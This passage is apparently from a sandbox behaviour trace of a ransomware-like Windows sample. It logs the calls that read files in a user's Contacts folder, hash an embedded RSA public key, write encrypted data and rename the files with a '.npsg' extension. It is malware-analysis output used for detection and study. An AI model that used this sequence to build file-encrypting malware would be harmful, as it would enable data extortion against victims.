hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.825] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, lpNumberOfBytesWritten=0x39afb14*=0x10b19, lpOverlapped=0x0) returned 1 [0235.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0235.826] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.826] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0235.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0235.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0235.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0235.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0235.826] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0235.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.827] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.827] CloseHandle (hObject=0x644) returned 1 [0235.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b947f8 [0235.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.829] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.npsg")) returned 1 [0235.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.830] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0235.831] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0235.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0235.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.831] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0235.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0235.832] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1171) returned 1 [0235.832] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0235.835] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.835] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0235.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.837] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.837] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x493, lpOverlapped=0x0) returned 1 [0235.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x6962b0 [0235.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.838] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0235.839] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0235.839] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0235.839] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0235.839] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0235.839] GetLastError () returned 0x0 [0235.839] SetLastError (dwErrCode=0x0) [0235.839] GetLastError () returned 0x0 [0235.839] SetLastError (dwErrCode=0x0) [0235.839] GetLastError () returned 0x0 [0235.839] SetLastError (dwErrCode=0x0) [0235.839] GetLastError () returned 0x0 [0235.839] SetLastError (dwErrCode=0x0) [0235.839] GetLastError () returned 0x0 [0235.839] SetLastError (dwErrCode=0x0) [0235.839] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] GetLastError () returned 0x0 [0235.840] SetLastError (dwErrCode=0x0) [0235.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.840] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.841] SetLastError (dwErrCode=0x0) [0235.841] GetLastError () returned 0x0 [0235.842] SetLastError (dwErrCode=0x0) [0235.842] GetLastError () returned 0x0 [0235.842] SetLastError (dwErrCode=0x0) [0235.842] GetLastError () returned 0x0 [0235.842] SetLastError (dwErrCode=0x0) [0235.842] GetLastError () returned 0x0 [0235.842] SetLastError (dwErrCode=0x0) [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0235.842] CryptDestroyHash (hHash=0x33f0408) returned 1 [0235.842] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0235.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.842] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0235.842] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.842] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0235.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x490) returned 0x3b7a060 [0235.842] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x6962b0 [0235.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x346fd28 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7cb0 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff00 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7cf8 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffed0 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff30 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0235.843] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b947f8 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b94a18 [0235.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0235.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a18 | out: hHeap=0x620000) returned 1 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffea0 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0235.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fff30 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0235.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.844] GetCurrentThreadId () returned 0x5b4 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687ca0 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.845] GetCurrentThreadId () returned 0x5b4 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0235.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff30 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffea0 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffee8 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff60 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff78 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffc0 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff30 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x64dd08 [0235.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0235.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0235.847] HeapFree (in: 